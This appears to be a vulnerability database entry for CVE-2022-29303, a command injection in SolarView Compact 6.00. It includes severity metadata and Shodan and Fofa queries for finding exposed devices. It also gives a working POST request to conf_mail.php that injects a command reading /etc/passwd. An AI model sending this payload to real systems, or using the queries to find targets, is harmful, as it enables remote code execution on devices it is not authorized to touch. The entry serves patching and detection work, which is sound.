| Title | SolarView Compact 6.00 - OS Command Injection |
|---|---|
| Author | badboycxcc |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. |
| Remediation | Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94372 |
| CVE ID | CVE-2022-29303 |
| CWE ID | CWE-78 |
| Shodan Query | http.html:"SolarView Compact"http.html:"solarview compact" |
| Fofa Query | body="solarview compact" |
| Tags | cve cve2022 injection solarview edb packetstorm rce kev contec vkev vuln |
SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
POST /conf_mail.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.20
Connection: close
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29303.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-29303.pcap
N/AN/A